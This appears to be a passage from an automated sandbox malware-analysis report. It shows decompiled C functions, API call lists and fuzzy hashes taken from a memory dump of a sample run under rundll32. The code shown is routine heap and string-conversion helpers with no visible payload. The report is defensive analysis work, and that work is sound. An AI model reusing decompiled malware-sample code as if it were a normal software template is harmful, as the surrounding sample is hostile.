                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CombinePath
                                                                                                                                                  • String ID: C:\Windows\$cscc.dat
                                                                                                                                                  • API String ID: 3422762182-1946977352
                                                                                                                                                  • Opcode ID: 9eec5979fb6ceaa2b1b64ec60783f91b0264d270af2cc07d458bcbb10aceff6f
                                                                                                                                                  • Instruction ID: 6a4c94472c92131a3620e50d9b81c8ef6e5de3b7233b0af420afecc13aeb0f79
                                                                                                                                                  • Opcode Fuzzy Hash: 9eec5979fb6ceaa2b1b64ec60783f91b0264d270af2cc07d458bcbb10aceff6f
                                                                                                                                                  • Instruction Fuzzy Hash: 0CC012B17C026463451129A55C05D9ABB9CDF19AB23418035BA04D1200D595E81187D4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477641A(char* _a4) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				short* _v12;
                                                                                                                                                  				int _t7;
                                                                                                                                                  				short* _t11;
                                                                                                                                                  				int _t12;
                                                                                                                                                  				short* _t13;
                                                                                                                                                  
                                                                                                                                                  				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
                                                                                                                                                  				_v8 = _t7;
                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                  					L3:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
                                                                                                                                                  				_v12 = _t11;
                                                                                                                                                  				if(_t11 == 0) {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				}
                                                                                                                                                  				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
                                                                                                                                                  				_t13 = _v12;
                                                                                                                                                  				if(_t12 == 0) {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}









                                                                                                                                                  0x04776439
                                                                                                                                                  0x0477643b
                                                                                                                                                  0x04776440
                                                                                                                                                  0x0477646e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477646e
                                                                                                                                                  0x0477644d
                                                                                                                                                  0x04776453
                                                                                                                                                  0x04776458
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776465
                                                                                                                                                  0x04776469
                                                                                                                                                  0x0477646c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776474

                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74164AB0,?), ref: 04776439
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04776446
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477644D
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04776465
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1432973188-0
                                                                                                                                                  • Opcode ID: 740714b9db0ea93622964c5766b37a1719b5b37ab1614d40c2197b749f798314
                                                                                                                                                  • Instruction ID: 7974330fce2071af496ac4b0ca0f975c00fd494f96fddedc71fb236bde0fe44b
                                                                                                                                                  • Opcode Fuzzy Hash: 740714b9db0ea93622964c5766b37a1719b5b37ab1614d40c2197b749f798314
                                                                                                                                                  • Instruction Fuzzy Hash: 55F090B6A05118BFEF006FA89DC4CBF7BBCEB452B87104636FA11E2284D2349D0097B0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477682F(void** _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t4;
                                                                                                                                                  				void** _t7;
                                                                                                                                                  				void* _t8;
                                                                                                                                                  
                                                                                                                                                  				_t7 = _a4;
                                                                                                                                                  				if(_t7 != 0) {
                                                                                                                                                  					_t4 =  *_t7;
                                                                                                                                                  					if(_t4 != 0) {
                                                                                                                                                  						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
                                                                                                                                                  					}
                                                                                                                                                  					_t8 = _t7[1];
                                                                                                                                                  					if(_t8 != 0) {
                                                                                                                                                  						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
                                                                                                                                                  					}
                                                                                                                                                  					return _t4;
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}







                                                                                                                                                  0x04776833
                                                                                                                                                  0x04776838
                                                                                                                                                  0x0477683a
                                                                                                                                                  0x0477684c
                                                                                                                                                  0x04776854
                                                                                                                                                  0x04776854
                                                                                                                                                  0x04776856
                                                                                                                                                  0x0477685b
                                                                                                                                                  0x04776863
                                                                                                                                                  0x04776863
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776866
                                                                                                                                                  0x04776869

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000), ref: 04776851
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04776854
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 04776860
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04776863
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 2a2b28718a558890e3407364e4f2777717bfc87bfea968f05f51b905eb991488
                                                                                                                                                  • Instruction ID: fd59ff5e0d6a51448f1f5c4686de2aee86c0497464c241abffe69042a32d5f51
                                                                                                                                                  • Opcode Fuzzy Hash: 2a2b28718a558890e3407364e4f2777717bfc87bfea968f05f51b905eb991488
                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0127270035867EA209ED69DC4F57B79CDF94765F444076E704D7245C564E8018AB1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776CED(signed int _a4, intOrPtr _a8) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int* _t11;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  
                                                                                                                                                  				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                  				if(_t11 != 0) {
                                                                                                                                                  					 *_t11 =  *_t11 & 0x00000000;
                                                                                                                                                  					_t11[1] = _a4;
                                                                                                                                                  					if(E04776D35(_t11, _t13, _a8) == 0) {
                                                                                                                                                  						_t11 = 0;
                                                                                                                                                  						HeapFree(GetProcessHeap(), 0, 0);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}






                                                                                                                                                  0x04776d05
                                                                                                                                                  0x04776d09
                                                                                                                                                  0x04776d11
                                                                                                                                                  0x04776d14
                                                                                                                                                  0x04776d1e
                                                                                                                                                  0x04776d21
                                                                                                                                                  0x04776d27
                                                                                                                                                  0x04776d27
                                                                                                                                                  0x04776d1e
                                                                                                                                                  0x04776d32

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776CFC
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776CFF
                                                                                                                                                    • Part of subcall function 04776D35: EnterCriticalSection.KERNEL32(?,74CB4F20,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D46
                                                                                                                                                    • Part of subcall function 04776D35: LeaveCriticalSection.KERNEL32(?,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D7F
                                                                                                                                                    • Part of subcall function 04776D35: Sleep.KERNELBASE(00002710,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D97
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D24
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D27
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2739146912-0
                                                                                                                                                  • Opcode ID: 6af51dd4f8b259546667cf48b71c2a2c428b2bee43b075ecf907a8c46903b15d
                                                                                                                                                  • Instruction ID: d59d72232a84ea2855624eec0f7b4dc8493e52a2e64509d1ec5f3dfc4f1b7a82
                                                                                                                                                  • Opcode Fuzzy Hash: 6af51dd4f8b259546667cf48b71c2a2c428b2bee43b075ecf907a8c46903b15d
                                                                                                                                                  • Instruction Fuzzy Hash: 47E06572200309AFEF206FE59DC8F57BB9DFF94364F40C425F6008A204DA74E8048720
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%